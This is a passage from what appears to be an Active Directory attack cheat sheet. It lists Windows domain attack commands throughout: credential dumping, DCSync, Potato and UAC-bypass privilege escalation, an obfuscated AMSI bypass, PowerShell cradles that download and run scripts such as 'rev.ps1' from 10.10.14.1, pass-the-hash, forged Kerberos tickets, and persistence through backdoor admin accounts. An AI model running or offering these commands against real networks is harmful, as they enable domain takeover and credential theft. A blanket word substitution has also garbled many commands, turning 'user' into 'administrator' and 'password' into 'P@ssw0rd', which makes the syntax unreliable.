copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\system.bak

# Analyze NTDS.dit
impacket-secretsdump -ntds ntds.dit -system system.bak -hashes lmhash:nthash LOCAL
impacket-secretsdump -ntds ntds.dit -system system.bak LOCAL -outputfile domain_hashes

# From Linux (Impacket) - requires DCSync rights
impacket-secretsdump domain.local/administrator:P@ssw0rd@DC01.domain.local -just-dc
impacket-secretsdump domain.local/administrator:P@ssw0rd@DC01.domain.local -just-dc-administrator krbtgt
impacket-secretsdump domain.local/administrator:P@ssw0rd@DC01.domain.local -just-dc -outputfile all_hashes

# Pass-the-Hash for DCSync
impacket-secretsdump domain.local/administrator@DC01.domain.local -hashes :NTLMHASH -just-dc

# From Windows (Mimikatz)
lsadump::dcsync /domain:domain.local /administrator:krbtgt
lsadump::dcsync /domain:domain.local /administrator:Administrator
lsadump::dcsync /domain:domain.local /all /csv

# Add DCSync rights if GenericAll/WriteDACL on domain
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity compromised_user -Rights DCSync

# List DPAPI credentials
dir %appdata%\Microsoft\Credentials\ /ah
dir %localappdata%\Microsoft\Credentials\ /ah

# Dump with Mimikatz
dpapi::cred /in:"%appdata%\Microsoft\Credentials\CREDFILEHASH"
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<SID>\<GUIDMASTERKEY>" /rpc
dpapi::cache
dpapi::cred /in:"%appdata%\Microsoft\Credentials\CREDFILEHASH"

# Secrets Manager (Windows Credential Manager)
cmdkey /list
.\LaZagne.exe windows
.\LaZagne.exe all

# System info
systeminfo
whoami /all
whoami /priv
net administrator %username% /domain
net localgroup administrators

# PowerUp - automated check
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.1/privesc.ps1')
Invoke-AllChecks

# WinPEAS
.\winPEASany.exe
.\winPEASx64.exe fast

# Watson (kernel vulns)
.\Watson.exe

# Seatbelt (audit)
.\Seatbelt.exe -group=all -full
.\Seatbelt.exe CredEnum WindowsEventForwarding LAPS

# Check
whoami /priv | findstr /i "SeImpersonatePrivilege\|SeAssignPrimaryToken"

# JuicyPotato (Win Server 2016 and earlier)
.\JuicyPotato.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c net administrator hacker P@ss /add && net localgroup Administrators hacker /add" -l 9999

# PrintSpoofer (Win 10 / Server 2019)
.\PrintSpoofer.exe -i -c cmd
.\PrintSpoofer.exe -c "net administrator hacker P@ss /add && net localgroup Administrators hacker /add"

# RoguePotato
.\RoguePotato.exe -r 10.10.14.1 -e "cmd.exe /c net administrator hacker P@ss /add" -l 9999

# GodPotato (Win 2012 to 2022)
.\GodPotato.exe -cmd "cmd /c net administrator hacker P@ss /add && net localgroup Administrators hacker /add"

# SweetPotato
.\SweetPotato.exe -a whoami
.\SweetPotato.exe -e EfsRpc -p "cmd.exe /c net administrator hacker P@ss /add"

# Check
whoami /priv | findstr SeBackupPrivilege

# Dump NTDS.dit via SeBackupPrivilege
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll

Set-SeBackupPrivilege

# Create shadow copy
$shadowPath = (vssadmin create shadow /for=C: | findstr "shadow copy volume")
Copy-FileSeBackupPrivilege "$shadowPath\Windows\NTDS\ntds.dit" C:\temp\ntds.dit -Overwrite
reg save HKLM\SYSTEM C:\temp\system.hive

# Extract from attacker
impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL

# Check
whoami /priv | findstr SeDebugPrivilege

# Dump LSASS with SeDebug
.\Mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

# Or Procdump
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Inject into SYSTEM processes
# Via Mimikatz: token::elevate then misc::memssp

# Replace system binary to get SYSTEM
# Example: overwrite utilman.exe with cmd.exe
.\SeRestoreAbuse.exe "C:\Windows\System32\cmd.exe"
# On RDP login screen: Windows Key + U - SYSTEM shell

# PowerUp automated
Get-ServiceUnquoted -Verbose
Get-ModifiableServiceFile -Verbose
Get-ModifiableService -Verbose

# Manual search
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /v /i "c:\windows"
sc qc "VulnerableService"

# Exploit a modifiable service
Invoke-ServiceAbuse -Name "VulnerableSvc" -Command "net localgroup Administrators domain.local\administrator /add"

# Weak File Permissions - replace binary
icacls "C:\Program Files\VulnApp\app.exe"
copy evil.exe "C:\Program Files\VulnApp\app.exe" /y
sc stop VulnSvc; sc start VulnSvc

# Unquoted service path
# If path = C:\Program Files\My App\service.exe
# Plant: C:\Program.exe or C:\Program Files\My.exe
msfvenom -p windows/exec CMD="net administrator hacker P@ss /add" -f exe > "C:\Program Files\My.exe"
sc stop VulnSvc; sc start VulnSvc

# Check
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Both must be set to 1

# PowerUp
Get-RegistryAlwaysInstallElevated

# Exploit
msfvenom -p windows/exec CMD="net administrator hacker P@ss /add && net localgroup Administrators hacker /add" -f msi > evil.msi
msiexec /quiet /qn /i evil.msi

# FODHelper (Windows 10)
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value ""
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c start powershell.exe"
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

# Eventvwr
New-Item "HKCU:\Software\Classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\Software\Classes\mscfile\shell\open\command" -Name "(default)" -Value "cmd.exe"
Start-Process "C:\Windows\System32\eventvwr.exe"

# Full bypass via UACME
.\Akagi64.exe 61 C:\evil.exe

# Autologon credentials in registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

# Credentials Manager
cmdkey /list
.\LaZagne.exe windows

# Unattend.xml and sysprep
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>null
type C:\Windows\Panther\Unattend\Unattended.xml
type C:\Windows\System32\sysprep\sysprep.xml

# List available tokens (Incognito)
.\incognito.exe list_tokens -u
.\incognito.exe impersonate_token "domain.local\Administrator"

# Mimikatz
token::list
token::elevate /domainadmin
token::impersonate /administrator:Administrator

# Via Meterpreter
use incognito
list_tokens -u
impersonate_token "domain.local\\Administrator"

# Search cpassword in SYSVOL
findstr /s /i "cpassword" \\domain.local\SYSVOL\*.xml
Get-GPPPassword

# From Linux
impacket-Get-GPPPassword domain.local/administrator:P@ssw0rd@DC01.domain.local
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd -M gpp_password
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd -M gpp_autologin

# Decrypt manually (publicly known AES key)
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

# Check if LAPS is deployed
Get-DomainComputer | Where-Object {$_."ms-Mcs-AdmPwdExpirationTime" -ne $null}
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions" | findstr /i LAPS

# Read LAPS passwords (if sufficient rights)
Get-DomainComputer -identity target-pc -properties ms-Mcs-AdmPwd
Get-LAPSComputers

netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd -M laps
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd --kdcHost DC01.domain.local -M laps -o COMPUTER="target-pc"

# Identify who can read LAPS
Find-LAPSDelegatedGroups
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ?{$_.ObjectAceType -like "*ms-Mcs-AdmPwd*" -and $_.ActiveDirectoryRights -match "ReadProperty"}

# Backup Operators - Dump NTDS.dit
net localgroup "Backup Operators" /domain

# Account Operators - Create accounts + add to groups
Get-DomainGroupMember "Account Operators"
New-ADUser -Name hacker -AccountPassword (ConvertTo-SecureString 'P@ss' -AsPlainText -Force) -Enabled $true
Add-ADGroupMember -Identity "Remote Desktop Users" -Members hacker

# Server Operators - Manipulate services on DC
Get-DomainGroupMember "Server Operators"
sc.exe \\DC01.domain.local config TrustedInstaller binPath="cmd /c net administrator hacker P@ss /add"
sc.exe \\DC01.domain.local start TrustedInstaller

# DNS Admins - SYSTEM via DLL
Get-DomainGroupMember "DNSAdmins"
dnscmd DC01.domain.local /config /serverlevelplugindll \\10.10.14.1\share\evil.dll
sc.exe \\DC01.domain.local stop dns; sc.exe \\DC01.domain.local start dns

# 1. DCSync in child domain for krbtgt
lsadump::dcsync /domain:child.domain.com /administrator:krbtgt

# 2. Get SID of child and parent
Get-DomainSID -Domain child.domain.com
Get-DomainSID -Domain domain.com

# 3. Golden ticket with SID History to Enterprise Admins (parent)
kerberos::golden /administrator:Administrator /domain:child.domain.com /sid:S-1-5-21-CHILD-SID /krbtgt:CHILD_KRBTGT_HASH /sids:S-1-5-21-PARENT-SID-519 /ptt

# Classic bypass
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Obfuscated version (copy-paste safe)
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' )).sE`T`VaLUE( ${n`ULl},${t`RuE} )

powershell -ep bypass
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.1/script.ps1')"

IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.1/PowerView.ps1')
# Encode in base64 to P@ssw0rd via cmd
$cmd = 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.1/rev.ps1")'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
[Convert]::ToBase64String($bytes)
powershell -EncodedCommand <BASE64>

# Host discovery
nmap -sn 10.10.10.0/24 -oG hosts.txt
crackmapexec smb 10.10.10.0/24

# Identify DCs (ports 389, 636, 88, 3268)
nmap -p 88,389,636,3268,3269 10.10.10.0/24
nmap -p 88 --open 10.10.10.0/24 -oG dcs.txt

# DNS enumeration
nslookup -type=SRV _ldap._tcp.dc._msdcs.domain.local
dig _ldap._tcp.dc._msdcs.domain.local SRV

sudo responder -I eth0 -w -d
sudo responder -I eth0 -A
sudo responder -I eth0 -w -d -P

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 5600 hash.txt rockyou.txt --rules-file best64.rule

sudo mitm6 -d domain.local
# + ntlmrelayx in parallel
impacket-ntlmrelayx -6 -t ldaps://DC01.domain.local -wh fakewpad.domain.local -l loot

enum4linux -a 192.168.1.10
enum4linux -P 172.16.5.5
crackmapexec smb 10.10.10.10 -u '' -p '' --users
crackmapexec smb 10.10.10.10 -u '' -p '' --shares
smbclient -N -L //10.10.10.10

ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local"
ldapsearch -H ldap://10.10.10.10 -x -b "DC=domain,DC=local" "(objectClass=administrator)" sAMAccountName
nmap -p 389 --script ldap-search --script-args 'ldap.base="dc=domain,dc=local"' 10.10.10.10

kerbrute userenum -d domain.local --dc 10.10.10.10 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
kerbrute userenum -d domain.local --dc 10.10.10.10 users.txt -o valid_users.txt

netexec smb 10.10.10.10 -u '' -p '' --users
netexec smb 10.10.10.10 -u 'administrator' -p 'P@ssw0rd' --users
netexec smb 10.10.10.10 -u 'administrator' -p 'P@ssw0rd' --groups
netexec ldap 10.10.10.10 -u 'administrator' -p 'P@ssw0rd' --users

Import-Module .\PowerView.ps1
Get-DomainUser | select -ExpandProperty cn
Get-DomainUser * | Select-Object samaccountname,description
Get-ADUser -Filter * | select Name,SamAccountName
net administrator /domain
net administrator administrator /domain

# Kerbrute
kerbrute passwordspray -d domain.local --dc 10.10.10.10 valid_users.txt 'Welcome1'
kerbrute passwordspray -d domain.local --dc 10.10.10.10 valid_users.txt 'Password2024!'

# CrackMapExec / NetExec
crackmapexec smb 10.10.10.0/24 -u users.txt -p 'Welcome1' --continue-on-success
netexec smb 10.10.10.10 -u users.txt -p passwords.txt --no-bruteforce
netexec ldap 10.10.10.10 -u users.txt -p 'Welcome1' --continue-on-success

# Check password policy BEFORE spraying (avoid lockout)
crackmapexec smb 10.10.10.10 -u 'administrator' -p 'P@ssw0rd' --pass-pol
enum4linux -P 10.10.10.10

bloodhound-python -d domain.local -dc DC01.domain.local -c All -u administrator -p 'P@ssw0rd'
bloodhound-python -d domain.local -dc DC01.domain.local -c All -u administrator -p 'P@ssw0rd' --zip

# With hash
bloodhound-python -d domain.local -dc DC01.domain.local -c All -u administrator --hashes :NTLMHASH

.\SharpHound.exe -c all --zipfilename bloodhound_data
Invoke-BloodHound -CollectionMethod all -ZipFileName bhdata.zip
Invoke-BloodHound -CollectionMethod All,GPOLocalGroup

-- All paths to DA
MATCH p=shortestPath((n:User)-[*1..]->(m:Group {name:"DOMAIN ADMINS@domain.local"})) RETURN p

-- Kerberoastable users
MATCH (u:User {hasspn:true}) RETURN u

-- Computers with Unconstrained Delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

# Domain
Get-DomainComputer
Get-ForestDomain
Get-DomainTrust
Get-ForestTrust
Get-DomainGroup "Domain Admins"
Get-DomainGroupMember "Domain Admins" | select -ExpandProperty membername

# Shares
Find-DomainShare -ExcludeStandard -ExcludePrint -ExcludeIPC -CheckShareAccess

# OUs and GPOs
Get-DomainOU -FullData
Get-DomainGPO -Name "{GUID}"
Get-DomainGPOLocalGroup -ResolveMembersToSIDs | select GPODisplayName,GroupName,GroupMembers

# ACLs (useful for DACL abuse)
Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,objectdn | ft
Get-DomainObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | Select IdentityReference,ActiveDirectoryRights

# LAPS
Get-DomainComputer -identity TARGET-PC -properties ms-Mcs-AdmPwd
Get-LAPSComputers
Find-LAPSDelegatedGroups

# Delegation
Get-DomainComputer -Unconstrained
Get-DomainUser -TrustedToAuth | select userprincipalname,msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | select name,msds-allowedtodelegateto

impacket-GetUserSPNs domain.local/administrator:P@ssw0rd -dc-ip 10.10.10.10 -request
impacket-GetUserSPNs domain.local/administrator:P@ssw0rd -dc-ip 10.10.10.10 -request -outputfile kerberoast.hashes
# With hash
impacket-GetUserSPNs domain.local/administrator -hashes :NTLMHASH -dc-ip 10.10.10.10 -request

# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

# PowerView
Get-DomainUser -SPN | select name,serviceprincipalname
Get-DomainSPNTicket -SPN "MSSQLSvc/sqlserver.domain.com"

hashcat -a 0 -m 13100 kerberoast.hashes rockyou.txt
hashcat -a 0 -m 13100 kerberoast.hashes rockyou.txt --rules-file best64.rule

Set-DomainObject -Identity TargetUser -Set @{serviceprincipalname='fake/spn'}
# Then kerberoast normally, then cleanup
Set-DomainObject -Identity TargetUser -Clear serviceprincipalname

impacket-GetNPUsers domain.local/ -dc-ip 10.10.10.10 -no-P@ssw0rd -usersfile valid_users.txt
impacket-GetNPUsers domain.local/administrator:P@ssw0rd -dc-ip 10.10.10.10 -request

# Rubeus
.\Rubeus.exe asreproast /outfile:asrep.hashes
.\Rubeus.exe asreproast /administrator:TargetUser /nowrap

# PowerView - find users without preauth
Get-DomainUser -PreauthNotRequired | select name

hashcat -a 0 -m 18200 asrep.hashes rockyou.txt

Set-DomainObject -Identity TargetUser -XOR @{useraccountcontrol=4194304}
# After exploitation, revert
Set-DomainObject -Identity TargetUser -XOR @{useraccountcontrol=4194304}

# Dump LSASS credentials
privilege::debug
sekurlsa::logonpasswords
sekurlsa::wdigest
lsadump::sam
lsadump::lsa /patch
lsadump::dcsync /administrator:krbtgt
lsadump::dcsync /domain:domain.local /all /csv

# Export Kerberos tickets
sekurlsa::tickets /export
kerberos::list /export

impacket-secretsdump domain.local/administrator:P@ssw0rd@10.10.10.10
impacket-secretsdump domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH
impacket-secretsdump -just-dc domain.local/administrator:P@ssw0rd@10.10.10.10
impacket-secretsdump -outputfile domain_hashes -just-dc INLANEFREIGHT/administrator:P@ssw0rd@DC01.domain.local -use-vss

netexec smb 10.10.10.10 -u admin -p P@ssw0rd --sam
netexec smb 10.10.10.10 -u admin -p P@ssw0rd --lsa
netexec smb 10.10.10.10 -u admin -p P@ssw0rd --ntds

# Task Manager > lsass.exe > Create dump file
pypykatz lsa minidump lsass.dmp

# CrackMapExec
crackmapexec smb 10.10.10.0/24 -u Administrator -H :NTLMHASH --local-auth
netexec smb 10.10.10.10 -u Administrator -H NTLMHASH

# Impacket
impacket-psexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH
impacket-wmiexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH
impacket-smbexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH
impacket-atexec domain.local/Administrator@10.10.10.10 -hashes :NTLMHASH "whoami"

# Evil-WinRM
evil-winrm -i 10.10.10.10 -u Administrator -H NTLMHASH

# Rubeus - Overpass-the-Hash (get TGT from NTLM hash)
.\Rubeus.exe asktgt /administrator:Administrator /rc4:NTLMHASH /ptt
.\Rubeus.exe asktgt /administrator:Administrator /aes256:AES256KEY /opsec /ptt

# Mimikatz - Overpass-the-Hash
sekurlsa::pth /administrator:Administrator /domain:domain.local /ntlm:NTLMHASH /run:powershell.exe

# Import a .kirbi ticket (Pass-the-Ticket)
.\Rubeus.exe ptt /ticket:ticket.kirbi
kerberos::ptt ticket.kirbi

# Check active tickets
klist
.\Rubeus.exe triage

impacket-secretsdump -just-dc domain.local/administrator:P@ssw0rd@DC01.domain.local
impacket-secretsdump -just-dc-administrator krbtgt domain.local/administrator:P@ssw0rd@DC01.domain.local
impacket-secretsdump -just-dc-administrator Administrator domain.local/administrator:P@ssw0rd@DC01.domain.local

lsadump::dcsync /domain:domain.local /administrator:krbtgt
lsadump::dcsync /domain:domain.local /all /csv

# Requires: DCSync rights (GenericAll, DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)
# Add DCSync rights via PowerView if GenericAll on domain
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity administrator -Rights DCSync

# Golden Ticket (requires krbtgt hash + domain SID)
kerberos::golden /administrator:Administrator /domain:domain.local /sid:S-1-5-21-XXXX /krbtgt:KRBTGTHASH /id:500 /groups:513,512,520,518,519 /startoffset:0 /endin:600 /renewmax:10080 /ptt

# Silver Ticket (requires machine account hash + SID)
kerberos::golden /administrator:Administrator /domain:domain.local /sid:S-1-5-21-XXXX /rc4:MACHINEACCOUNTHASH /target:DC01.domain.local /service:HOST /id:500 /ptt

# Get domain SID
Get-DomainSID
wmic useraccount get name,sid

impacket-ticketer -nthash KRBTGTHASH -domain-sid S-1-5-21-XXXX -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-P@ssw0rd domain.local/Administrator@DC01.domain.local

# Identify
Get-DomainComputer -Unconstrained | select dnshostname

# Exploit (from compromised server with delegation)
.\Rubeus.exe monitor /interval:5 /nowrap

# Force DC connection (PrinterBug)
.\MS-RPRN.exe \\DC01.domain.local \\unconstrained-srv.domain.local

# P@ssw0rd the captured TGT
.\Rubeus.exe ptt /ticket:doIFxTCC...

Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Exploitation with Rubeus
.\Rubeus.exe s4u /administrator:svc_constrained /impersonateuser:Administrator /msdsspn:cifs/DC01.domain.local /ptt /rc4:NTLMHASH
.\Rubeus.exe s4u /administrator:svc_constrained /impersonateuser:Administrator /msdsspn:time/dc /altservice:ldap /ptt /rc4:NTLMHASH

# Requires GenericWrite/GenericAll on a computer object
# Create a fake machine account (PowerMad)
New-MachineAccount -MachineAccount FakeMachine -P@ssw0rd $(ConvertTo-SecureString 'P@ssw0rd!' -AsPlainText -Force)

# Configure msDS-AllowedToActOnBehalfOfOtherIdentity
$sid = Get-DomainComputer -Identity FakeMachine -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($sid))"
$SDbytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDbytes,0)
Get-DomainComputer -Identity TargetSrv | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDbytes}

# Exploit with Rubeus
.\Rubeus.exe s4u /administrator:FakeMachine$ /rc4:NTLMHASH_FAKEMACHINE /impersonateuser:Administrator /msdsspn:CIFS/TargetSrv.domain.local /ptt

# Linux
impacket-wmiexec domain.local/administrator:P@ssw0rd@10.10.10.10
impacket-wmiexec domain.local/administrator@10.10.10.10 -hashes :NTLMHASH

# Windows
Invoke-WmiMethod win32_process -ComputerName target.domain.local -name create -argumentlist "cmd.exe /c whoami > C:\out.txt"

impacket-psexec domain.local/administrator:P@ssw0rd@10.10.10.10
impacket-psexec domain.local/administrator@10.10.10.10 -hashes :NTLMHASH
impacket-smbexec domain.local/administrator:P@ssw0rd@10.10.10.10

evil-winrm -i 10.10.10.10 -u administrator -p P@ssw0rd
evil-winrm -i 10.10.10.10 -u administrator -H NTLMHASH
evil-winrm -i 10.10.10.10 -u administrator -p P@ssw0rd -s /opt/scripts

# Create a session
$SecPassword = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('domain.local\administrator', $SecPassword)

Invoke-Command -Credential $Cred -ComputerName DC01.domain.local -ScriptBlock {whoami}
Enter-PSSession -ComputerName DC01.domain.local -Credential $Cred
$sess = New-PSSession -Credential $Cred -ComputerName DC01.domain.local
Copy-Item -Path .\tool.exe -ToSession $sess -Destination "C:\Users\Public\"

schtasks /create /tn "shell" /ru "NT Authority\SYSTEM" /s DC01.domain.local /sc once /st 00:00 /tr "cmd.exe /c powershell -enc BASE64CMD"
schtasks /RUN /TN "shell" /s DC01.domain.local

# On attacker
./proxy -selfcert -laddr 0.0.0.0:11601

# On target
.\agent.exe -connect 10.10.14.1:11601 -ignore-cert

# In ligolo
session
start
# Add the route
ip route add 172.16.0.0/24 dev ligolo

# Identify interesting ACLs on a administrator/group
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "compromised_user"}

# GenericAll / GenericWrite → Reset password
$NewPass = ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force
Set-DomainUserPassword -Identity targetuser -AccountPassword $NewPass

# WriteDACL → Add DCSync rights
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity myuser -Rights DCSync

# ForceChangePassword (ExtendedRight)
$cred = Get-Credential
Set-DomainUserPassword -Identity targetuser -AccountPassword $NewPass -Credential $cred

# GenericWrite → Add to group
Add-DomainGroupMember -Identity "Domain Admins" -Members myuser

# WriteOwner → Take ownership of an object
Set-DomainObjectOwner -Identity TargetUser -OwnerIdentity myuser
Add-DomainObjectAcl -TargetIdentity TargetUser -PrincipalIdentity myuser -Rights All

certipy find -u administrator@domain.local -p P@ssw0rd -dc-ip 10.10.10.10 -stdout
certipy find -u administrator@domain.local -p P@ssw0rd -dc-ip 10.10.10.10 -vulnerable -stdout

certipy req -u administrator@domain.local -p P@ssw0rd -ca CA_NAME -template VulnTemplate -upn administrator@domain.local -dc-ip 10.10.10.10
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

certipy template -u administrator@domain.local -p P@ssw0rd -template VulnTemplate -save-old
certipy req -u administrator@domain.local -p P@ssw0rd -ca CA_NAME -template VulnTemplate -upn administrator@domain.local

certipy shadow auto -u administrator@domain.local -p P@ssw0rd -account targetuser -dc-ip 10.10.10.10

# Terminal 1
impacket-ntlmrelayx -t http://CA_SERVER/certsrv/certfnsh.asp --adcs --template DomainController

# Terminal 2
python3 PetitPotam.py 10.10.14.1 DC01.domain.local

# Retrieve the TGT
.\Rubeus.exe asktgt /administrator:DC$ /certificate:BASE64CERT /ptt

New-GPO -Name 'Legit Update' | New-GPLink -Target 'OU=Workstations,DC=domain,DC=local'
Set-GPPrefRegistryValue -Name 'Legit Update' -Context Computer -Action Create -Key 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run' -ValueName 'Update' -Value 'cmd.exe /c powershell -enc BASE64' -Type ExpandString

# SharpGPOAbuse
SharpGPOAbuse.exe --AddComputerTask --TaskName "Windows Update" --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" --Arguments "/c net localgroup Administrators domain.local\administrator /add" --GPOName "Legit Update"

# Enumerate MSSQL instances
netexec mssql 10.10.10.0/24 -u administrator -p P@ssw0rd
impacket-mssqlclient domain.local/administrator:P@ssw0rd@10.10.10.10 -windows-auth

-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';

-- Find linked servers
EXEC sp_linkedservers;

-- Execute on linked server
EXEC ('xp_cmdshell ''whoami'' ') AT LINKEDSERVER;

-- Force NTLM auth (capture hash)
EXEC master..xp_dirtree '\\10.10.14.1\share';

# Enumerate trusts
Get-DomainTrust
Get-ForestTrust
Get-DomainForeignGroupMember -domain targetdomain.com

# Forge inter-domain ticket (child → parent)
# Get krbtgt hash from child domain via DCSync
lsadump::dcsync /domain:child.domain.com /administrator:krbtgt

# Golden Ticket with SID History to parent domain
kerberos::golden /administrator:Administrator /domain:child.domain.com /sid:S-1-5-21-CHILD-SID /krbtgt:CHILD_KRBTGT_HASH /sids:S-1-5-21-PARENT-SID-519 /ptt

# AdminSDHolder - persist in DA rights
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity myuser -Rights All

# Skeleton Key (patch LSASS - all auth with "mimikatz")
misc::skeleton

# DSRM account (local account on DC)
lsadump::lsa /patch
# Enable DSRM network auth
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

# Add administrator to DA group
net administrator hacker P@ss123 /add /domain
net group "Domain Admins" hacker /add /domain

# SID History
Add-ADGroupMember -Identity "Domain Admins" -Members newuser

# PowerUp - check all vectors
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# Vulnerable services
Invoke-ServiceAbuse -Name "VulnerableSvc" -Command "net localgroup Administrators domain.local\administrator /add"

# Unquoted service path
Write-ServiceBinary -Name 'VulnSvc' -Command 'cmd /c net administrator hacker P@ss /add' -Path 'C:\Program Files\VulnSvc'
net stop VulnSvc; net start VulnSvc

# UAC Bypass (FODHelper)
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value ""
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c start powershell.exe"
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

# Snaffler (find sensitive files)
.\Snaffler.exe -s -d domain.local -o snaffler.log

# CrackMapExec / NetExec
netexec smb 10.10.10.0/24 -u administrator -p P@ssw0rd --shares
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd -M spider_plus
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd --spider C$ --pattern '*.config,*.xml,*.txt,*.bat,*password*'

# SMBClient
smbclient //10.10.10.10/SHARE -U 'domain.local\administrator%P@ssw0rd'